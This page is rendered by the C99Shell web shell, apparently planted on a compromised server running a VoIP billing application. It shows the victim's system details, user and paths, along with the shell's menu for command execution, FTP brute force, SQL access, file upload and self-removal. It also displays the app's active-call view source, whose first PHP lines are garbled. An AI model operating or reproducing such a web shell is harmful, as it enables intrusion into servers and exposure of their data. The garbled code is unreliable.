!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/billing/system/application/views/call/   drwxr-xr-x
Free 13.35 GB of 57.97 GB (23.02%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     active_call_pagi.php (6.33 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |


    <?php
    $start 
$startoffset $limit 1;
    
$end = ($startoffset +)* $limit ;

    if(
$total<$start)
    
$start $total;

    if(
$total<=$end)
    
$end $total;
    
?>


<table width="100%" border="0" cellspacing="0" cellpadding="0" class="tableBorder">
  <tr>
    <td class="mainTableTitle">

      <span>&nbsp;&nbsp;&raquo;</span> Active Call List Total : <?=$total?> Showing <?=$start?> to <?=$end?>

    </td>
  </tr>


 <tr>
    <td>

 <!-- Clinets List -->

 <table class="gbTable">

   <tr class="header">
     <td width="2%"><div align="left" style="padding-left:5px;">NR</div></td>
     <td width="7%"><div align="left" style="padding-left:5px;">Client</div></td>
     <td width="8%"><div align="left" style="padding-left:5px;">R - I</div></td>
     <td width="8%"><div align="left" style="padding-left:5px;">R - II</div></td>
     <td width="8%"><div align="left" style="padding-left:5px;">R - III</div></td>
     <td width="8%"><div align="left" style="padding-left:5px;">R - IV</div></td>
     <td width="13%"><div align="left" style="padding-left:5px;">Rate</div></td>
     <td width="8%"><div align="left" style="padding-left:5px;">Trunk</div></td>
     <td width="5%"><div align="left" style="padding-left:5px;">Prefix</div></td>
     <td width="9%"><div align="left" style="padding-left:5px;">Number</div></td>
     <td width="11%"><div align="left" style="padding-left:5px;">Call Start</div></td>
     <td width="6%"><div align="left" style="padding-left:5px;">Duration</div></td>
     <td width="7%"><div align="left" style="padding-left:5px;">CallerID</div></td>
   </tr>



<?
$i=1;
if(is_array($callList))
{
foreach($callList as $row)
{
$passid =$row->id;


if($row->id_reseller==-1)
{

  $reseller4Login = "--";
  $reseller3Login = "--";
  $reseller2Login = "--";
  $reseller1Login = "--";
}
else
{
  $reseller1Login = $this->generallib->getResellerLogin($row->id_reseller,1);
  $reseller2ID = $this->generallib->getIDReseller($row->id_reseller,1);
  if($reseller2ID == -1)
  {
     $reseller4Login = "--";
     $reseller3Login = "--";
     $reseller2Login = "--";
  }
  else
  {
    $reseller2Login = $this->generallib->getResellerLogin($reseller2ID,2);
    $reseller3ID = $this->generallib->getIDReseller($reseller2ID,2);
    if($reseller3ID == -1)
    {
      $reseller4Login = "--";
      $reseller3Login = "--";
    }
    else
    {
      $reseller3Login = $this->generallib->getResellerLogin($reseller3ID,3);
      $reseller4ID = $this->generallib->getIDReseller($reseller3ID,3);
      if($reseller4ID == -1)
      {
         $reseller4Login = "--";
      }
      else
      {
         $reseller4Login = $this->generallib->getResellerLogin($reseller4ID,4);
      }
    }


  }



}



$now = date('Y-m-d H:i:s');
$strNow = strtotime($now);
$strCallStart = strtotime($row->call_start);


//$duration = $strNow - $strCallStart;
$duration = $row->duration;
$callDuration  = $this->generallib->sec_to_time($duration);


?>

      <?

              if($i%2==0)
               {

               $str = "
                        <TR id = \"$passid\" class=\"row2 \"
                                      onmousedown=\"rowPointer(this, 'down', 'row2', 'rowSel', 'rowMark')\"
                                      onmouseover=\"rowPointer(this, 'over', 'row2', 'rowSel', 'rowMark')\"
                             onmouseout=\"rowPointer(this, 'out', 'row2', 'rowSel', 'rowMark')\">";


               }
              else
               {
                  $str = "
                           <TR id = \"$passid\" class=\"row1 \"
                                         onmousedown=\"rowPointer(this, 'down', 'row1', 'rowSel', 'rowMark')\"
                                         onmouseover=\"rowPointer(this, 'over', 'row1', 'rowSel', 'rowMark')\"
                             onmouseout=\"rowPointer(this, 'out', 'row1', 'rowSel', 'rowMark')\">";
               }



      echo $str;

      ?>

 <td align=center class="tableBorderAll" style="padding-left:0px;padding-top:2px;padding-bottom:2px;"><input name="checkActive" type="checkbox"  id="checkActive" value="1" /></td>
 <td align=left class="tableBorderAll" style="padding-left:5px;padding-top:2px;padding-bottom:2px;"><?=$row->pinnumber?></td>
 <td align=left class="tableBorderAll" style="padding-left:5px;padding-top:2px;padding-bottom:2px;"><?=$reseller1Login?></td>
 <td align=left class="tableBorderAll" style="padding-left:5px;padding-top:2px;padding-bottom:2px;"><?=$reseller2Login?></td>
 <td align=left class="tableBorderAll" style="padding-left:5px;padding-top:2px;padding-bottom:2px;"><?=$reseller3Login?></td>
 <td align=left class="tableBorderAll" style="padding-left:5px;padding-top:2px;padding-bottom:2px;"><?=$reseller4Login?></td>
 <td align=left class="tableBorderAll" style="padding-left:5px;padding-top:2px;padding-bottom:2px;"><?=$row->rateName?></td>
 <td align=left class="tableBorderAll" style="padding-left:5px;padding-top:2px;padding-bottom:2px;"><?=$row->trunkName?></td>
 <td align=left class="tableBorderAll" style="padding-left:5px;padding-top:2px;padding-bottom:2px;"><?=$row->billing_prefix?></td>
 <td align=left class="tableBorderAll" style="padding-left:5px;padding-top:2px;padding-bottom:2px;"><?=$row->dialnumber?></td>
 <td align=left class="tableBorderAll" style="padding-left:5px;padding-top:2px;padding-bottom:2px;"><?=$row->call_start?></td>
 <td align=left class="tableBorderAll" style="padding-left:5px;padding-top:2px;padding-bottom:2px;"><?=$callDuration?></td>
 <td align=left  style="padding-left:5px;padding-top:2px;padding-bottom:2px;"><?=$row->pinnumber?></td>
   </tr>

<?
$i++;
}

}

?>


 </table>

<!-- End Clients List -->

    </td>
  </tr>

  <tr>
    <td align="center" style="padding-top:5px;">

    <input type="hidden" name="id_trunk" id="id_trunk" value="<?=$id_trunk?>" />
    <input type="hidden" name="limit" id="limit" value="<?=$limit?>" />
    <input type="hidden" name="startoffset" id="startoffset" value="<?=$startoffset?>" />
    <input type="hidden" name="id_rate" id="id_rate" value="<?=$id_rate?>" />
    <input type="hidden" name="clientType" id="clientType" value="<?=$clientType?>" />
    <input type="hidden" name="calledNumnber" id="calledNumnber" value="<?=$calledNumnber?>" />
    <input type="hidden" name="clientName" id="clientName" value="<?=$clientName?>" />
    <input type="hidden" name="id_reseller" id="id_reseller" value="<?=$id_reseller?>" />

<?


      $p = new paginationClass;
      $p->Items($total);

      if($startoffset==0)
      $startoffset = 1;

      $p->limit($limit);
      $p->target("paginator.php");
      $p->currentPage($startoffset);
      $p->adjacents(3);
      $p->show();



?>


    </td>
  </tr>

</table>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0053 ]--